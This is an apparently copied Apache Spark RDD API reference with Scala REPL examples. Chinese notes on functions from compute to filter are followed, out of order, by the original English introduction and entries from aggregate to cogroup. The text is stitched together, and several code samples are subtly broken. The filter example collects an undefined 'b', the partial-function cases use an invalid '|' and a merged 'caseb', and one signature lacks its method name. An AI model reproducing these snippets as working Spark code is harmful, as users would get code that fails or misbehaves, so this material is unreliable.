执行以来关系,计算RDD的实际表达.不由用户直接调用

def compute(split: Partition, context: TaskContext):Iterator[T]

context, sparkContext:

返回创建使用的RDD.

def compute(split: Partition, context: TaskContext):Iterator[T]

count:

返回RDD元组中items的数量

def count(): Long

val c = sc.parallelize(List("Gnu","Cat", "Rat", "Dog"), 2)

c.count

res2: Long = 4

countApprox:

这个不知道.

def (timeout: Long, confidence: Double = 0.95):PartialResult[BoundedDouble]

countByKey [Pair]:

类似count,这个是计算key的数量的,并且返回map

def countByKey(): Map[K, Long]

val c = sc.parallelize(List((3, "Gnu"), (3,"Yak"), (5, "Mouse"), (3, "Dog")), 2)

c.countByKey

res3: scala.collection.Map[Int,Long] = Map(3 -> 3,5 -> 1)

countByValue:

计算value的count,然后返回count->value的map

def countByValue(): Map[T, Long]

val b =sc.parallelize(List(1,2,3,4,5,6,7,8,2,4,2,1,1,1,1,1))

b.countByValue

res27: scala.collection.Map[Int,Long] = Map(5 -> 1,8 -> 1, 3 -> 1, 6 -> 1, 1 -> 6, 2 -> 3, 4 -> 2, 7 -> 1)

countByValueApprox:

功能尚不知.

def countByValueApprox(timeout: Long, confidence:Double = 0.95): PartialResult[Map[T, BoundedDouble]]

countApproxDistinct:

近似计数，当数据量大的时候很有用

def countApproxDistinct(relativeSD: Double = 0.05): Long

val a = sc.parallelize(1 to 10000, 20)

val b = a++a++a++a++a

b.countApproxDistinct(0.1)

val a = sc.parallelize(1 to 30000, 30)

val b = a++a++a++a++a

b.countApproxDistinct(0.05)

res28: Long = 30097

可以看出,会计算出a的大概值范围

countApproxDistinctByKey [Pair]:

类似countApproxDistinct,但计算不同值的不同key的数量,所以RDD必须是key-value的形式,执行计算的速度快.

def countApproxDistinctByKey(relativeSD: Double =0.05): RDD[(K, Long)]

def countApproxDistinctByKey(relativeSD: Double,numPartitions: Int): RDD[(K, Long)]

def countApproxDistinctByKey(relativeSD: Double,partitioner: Partitioner): RDD[(K, Long)]

val a = sc.parallelize(List("Gnu","Cat", "Rat", "Dog"), 2)

val b = sc.parallelize(a.takeSample(true, 10000, 0),20)

val c = sc.parallelize(1 to b.count().toInt, 20)

val d = b.zip(c)

d.countApproxDistinctByKey(0.1).collect

res15: Array[(String, Long)] = Array((Rat,2567),(Cat,3357), (Dog,2414), (Gnu,2494))

d.countApproxDistinctByKey(0.01).collect

res16: Array[(String, Long)] = Array((Rat,2555),(Cat,2455), (Dog,2425), (Gnu,2513))

d.countApproxDistinctByKey(0.001).collect

res0: Array[(String, Long)] = Array((Rat,2562),(Cat,2464), (Dog,2451), (Gnu,2521))

可以看出可以计算出value的大致范围

dependencies:

返回当前RDD所依赖的RDD

final def dependencies: Seq[Dependency[_]]

val b = sc.parallelize(List(1,2,3,4,5,6,7,8,2,4,2,1,1,1,1,1))

b: org.apache.spark.rdd.RDD[Int] =ParallelCollectionRDD[32] at parallelize at <console>:12

b.dependencies.length

Int = 0

b.map(a => a).dependencies.length

res40: Int = 1

b.cartesian(a).dependencies.length

res41: Int = 2

b.cartesian(a).dependencies

res42: Seq[org.apache.spark.Dependency[_]] =List(org.apache.spark.rdd.CartesianRDD$$anon$1@576ddaaa,org.apache.spark.rdd.CartesianRDD$$anon$2@6d2efbbd)

distinct:

返回一个新的RDD,这个RDD包含的是唯一值

def distinct(): RDD[T]

def distinct(numPartitions: Int): RDD[T]

val c = sc.parallelize(List("Gnu","Cat", "Rat", "Dog", "Gnu","Rat"), 2)

c.distinct.collect

res6: Array[String] = Array(Dog, Gnu, Cat, Rat)

val a = sc.parallelize(List(1,2,3,4,5,6,7,8,9,10))

a.distinct(2).partitions.length

res16: Int = 2

a.distinct(3).partitions.length

res17: Int = 3

中间的数字是,开启的Partitions个数

first:

返回RDD中的第一个数据

def first(): T

val c = sc.parallelize(List("Gnu","Cat", "Rat", "Dog"), 2)

c.first

res1: String = Gnu

filter:

非常常用的功能,内部使用返回布尔值的方法,对RDD中的每个data使用该方法,返回result RDD

def filter(f: T => Boolean): RDD[T]

val a = sc.parallelize(1 to 10, 3)

a.filter(_ % 2 == 0)

b.collect

res3: Array[Int] = Array(2, 4, 6, 8, 10)

注意:他必须能够处理RDD中所有的数据项.scala提供了一些方法来处理混合数据类型.如果右一些数据是损坏的,你不想处理,但是对于其他没有损坏的数据你想使用类似map()的方法

Examples for mixed data without partial functions:

val b = sc.parallelize(1 to 8)

b.filter(_ < 4).collect

res15: Array[Int] = Array(1, 2, 3)

val a = sc.parallelize(List("cat","horse", 4.0, 3.5, 2, "dog"))

a.filter(_ < 4).collect

<console>:15: error: value < is not a memberof Any

失败原因:

操作符不支持有的字符

对混合类型的处理:

val a = sc.parallelize(List("cat","horse", 4.0, 3.5, 2, "dog"))

a.collect({case a: Int => "is integer" |

caseb: String => "is string" }).collect

res17: Array[String] = Array(is string, is string, isinteger, is string)

val myfunc: PartialFunction[Any, Any] = {

case a:Int => "is integer" |

case b: String=> "is string" }

myfunc.isDefinedAt("") 判断myfunc是否支持

res21: Boolean = true

myfunc.isDefinedAt(1)

res22: Boolean = true

myfunc.isDefinedAt(1.5) 不支持

res23: Boolean = false

Our research group has a very strong focus on usingand improving Apache Spark to solve real world programs. In order to do this weneed to have a very solid understanding of the capabilities of Spark. So one ofthe first things we have done is to go through the entire Spark RDD API andwrite examples to test their functionality. This has been a very usefulexercise and we would like to share the examples with everyone.

Authors of examples: Matthias Langer and Zhen He

Emails addresses: m.langer@latrobe.edu.au,z.he@latrobe.edu.au

These examples have only been tested for Spark version0.9. We assume the functionality of Spark is stable and therefore the examplesshould be valid for later releases.

Here is a pdf of the all the examples: SparkExamples

The RDD API By Example

RDD is short for Resilient Distributed Dataset. RDDsare the workhorse of the Spark system. As a user, one can consider a RDD as ahandle for a collection of individual data partitions, which are the result ofsome computation.

However, an RDD is actually more than that. On clusterinstallations, separate data partitions can be on separate nodes. Using the RDDas a handle one can access all partitions and perform computations andtransformations using the contained data. Whenever a part of a RDD or an entireRDD is lost, the system is able to reconstruct the data of lost partitions byusing lineage information. Lineage refers to the sequence of transformationsused to produce the current RDD. As a result, Spark is able to recoverautomatically from most failures.

All RDDs available in Spark derive either directly orindirectly from the class RDD. This class comes with a large set of methodsthat perform operations on the data within the associated partitions. The classRDD is abstract. Whenever, one uses a RDD, one is actually using a concertizedimplementation of RDD. These implementations have to overwrite some corefunctions to make the RDD behave as expected.

One reason why Spark has lately become a very popularsystem for processing big data is that it does not impose restrictionsregarding what data can be stored within RDD partitions. The RDD API alreadycontains many useful operations. But, because the creators of Spark had to keepthe core API of RDDs common enough to handle arbitrary data-types, manyconvenience functions are missing.

The basic RDD API considers each data item as a singlevalue. However, users often want to work with key-value pairs. Therefore Sparkextended the interface of RDD to provide additional functions(PairRDDFunctions), which explicitly work on key-value pairs. Currently, thereare four extensions to the RDD API available in spark. They are as follows:

DoubleRDDFunctions

This extension contains many useful methods foraggregating numeric values. They become available if the data items of an RDDare implicitly convertible to the Scala data-type double.

PairRDDFunctions

Methods defined in this interface extension becomeavailable when the data items have a two component tuple structure. Spark willinterpret the first tuple item (i.e. tuplename. 1) as the key and the seconditem (i.e. tuplename. 2) as the associated value.

OrderedRDDFunctions

Methods defined in this interface extension becomeavailable if the data items are two-component tuples where the key isimplicitly sortable.

SequenceFileRDDFunctions

This extension contains several methods that allowusers to create Hadoop sequence- les from RDDs. The data items must be twocompo- nent key-value tuples as required by the PairRDDFunctions. However,there are additional requirements considering the convertibility of the tuplecomponents to Writable types.

Since Spark will make methods with extendedfunctionality automatically available to users when the data items fulfill theabove described requirements, we decided to list all possible availablefunctions in strictly alphabetical order. We will append either of thefollowingto the function-name to indicate it belongs to an extension thatrequires the data items to conform to a certain format or type.

[Double] - Double RDD Functions

[Ordered] - OrderedRDDFunctions

[Pair] - PairRDDFunctions

[SeqFile] - SequenceFileRDDFunctions

aggregate

The aggregate-method provides an interface forperforming highly customized reductions and aggregations with a RDD. However,due to the way Scala and Spark execute and process data, care must be taken toachieve deterministic behavior. The following list contains a few observationswe made while experimenting with aggregate:

The reduceand combine functions have to be commutative and associative.

As can beseen from the function definition below, the output of the combiner must beequal to its input. This is necessary because Spark will chain-execute it.

The zerovalue is the initial value of the U component when either seqOp or combOp areexecuted for the first element of their domain of influence. Depending on whatyou want to achieve, you may have to change it. However, to make your codedeterministic, make sure that your code will yield the same result regardlessof the number or size of partitions.

Do notassume any execution order for either partition computations or combiningpartitions.

The neutralzeroValue is applied at the beginning of each sequence of reduces within theindividual partitions and again when the output of separate partitions iscombined.

Why have twoseparate combine functions? The first functions maps the input values into theresult space. Note that the aggregation data type (1st input and output) can bedifferent (U != T). The second function reduces these mapped values in theresult space.

Why wouldone want to use two input data types? Let us assume we do an archaeologicalsite survey using a metal detector. While walking through the site we take GPScoordinates of important findings based on the output of the metal detector.Later, we intend to draw an image of a map that highlights these locationsusing the aggregate function. In this case the zeroValue could be an area mapwith no highlights. The possibly huge set of input data is stored as GPScoordinates across many partitions. seqOp could convert the GPS coordinates tomap coordinates and put a marker on the map at the respective position. combOpwill receive these highlights as partial maps and combine them into a singlefinal output map.

Listing Variants

def aggregate[U: ClassTag](zeroValue: U)(seqOp: (U, T)=> U, combOp: (U, U) => U): U

Examples 1

val z = sc.parallelize(List(1,2,3,4,5,6), 2)

z.aggregate(0)(math.max(_, _), _ + _)

res40: Int = 9

val z =sc.parallelize(List("a","b","c","d","e","f"),2)

z.aggregate("")(_ + _, _+_)

res115: String = abcdef

z.aggregate("x")(_ + _, _+_)

res116: String = xxdefxabc

val z =sc.parallelize(List("12","23","345","4567"),2)

z.aggregate("")((x,y) =>math.max(x.length, y.length).toString, (x,y) => x + y)

res141: String = 42

z.aggregate("")((x,y) =>math.min(x.length, y.length).toString, (x,y) => x + y)

res142: String = 11

val z =sc.parallelize(List("12","23","345",""),2)

z.aggregate("")((x,y) =>math.min(x.length, y.length).toString, (x,y) => x + y)

res143: String = 10

The main issue with the code above is that the resultof the inner min is a string of length 1.

The zero in the output is due to the empty string beingthe last string in the list. We see this result because we are not recursivelyreducing any further within the partition for the final string.

Examples 2

val z =sc.parallelize(List("12","23","","345"),2)

z.aggregate("")((x,y) =>math.min(x.length, y.length).toString, (x,y) => x + y)

res144: String = 11

In contrast to the previous example, this example hasthe empty string at the beginning of the second partition. This results inlength of zero being input to the second reduce which then upgrades it a lengthof 1. (Warning: The above example shows bad design since the output isdependent on the order of the data inside the partitions.)

cartesian

Computes the cartesian product between two RDDs (i.e.Each item of the first RDD is joined with each item of the second RDD) andreturns them as a new RDD. (Warning: Be careful when using this function.!Memory consumption can quickly become an issue!)

Listing Variants

def cartesian[U: ClassTag](other: RDD[U]): RDD[(T, U)]

Example

val x = sc.parallelize(List(1,2,3,4,5))

val y = sc.parallelize(List(6,7,8,9,10))

x.cartesian(y).collect

res0: Array[(Int, Int)] = Array((1,6), (1,7), (1,8),(1,9), (1,10), (2,6), (2,7), (2,8), (2,9), (2,10), (3,6), (3,7), (3,8), (3,9),(3,10), (4,6), (5,6), (4,7), (5,7), (4,8), (5,8), (4,9), (4,10), (5,9), (5,10))

checkpoint

Will create a checkpoint when the RDD is computednext. Checkpointed RDDs are stored as a binary file within the checkpointdirectory which can be specified using the Spark context. (Warning: Spark applieslazy evaluation. Checkpointing will not occur until an action is invoked.)

Important note: the directory "my_directory_name" should exist inall slaves. As an alternative you could use an HDFS directory URL as well.

Listing Variants

def checkpoint()

Example

sc.setCheckpointDir("my_directory_name")

val a = sc.parallelize(1 to 4)

a.checkpoint

a.count

14/02/25 18:13:53 INFO SparkContext: Starting job:count at <console>:15

...

14/02/25 18:13:53 INFO MemoryStore: Block broadcast_5stored as values to memory (estimated size 115.7 KB, free 296.3 MB)

14/02/25 18:13:53 INFO RDDCheckpointData: Donecheckpointing RDD 11 tofile:/home/cloudera/Documents/spark-0.9.0-incubating-bin-cdh4/bin/my_directory_name/65407913-fdc6-4ec1-82c9-48a1656b95d6/rdd-11,new parent is RDD 12

res23: Long = 4

coalesce, repartition

Coalesces the associated data into a given number ofpartitions. repartition(numPartitions) is simply an abbreviation forcoalesce(numPartitions, shuffle = true).

Listing Variants

def coalesce ( numPartitions : Int , shuffle : Boolean= false ): RDD [T]

def repartition ( numPartitions : Int ): RDD [T]

Example

val y = sc.parallelize(1 to 10, 10)

val z = y.coalesce(2, false)

z.partitions.length

res9: Int = 2

cogroup [Pair], groupWith [Pair]

A very powerful set of functions that allow groupingup to 3 key-value RDDs together using their keys.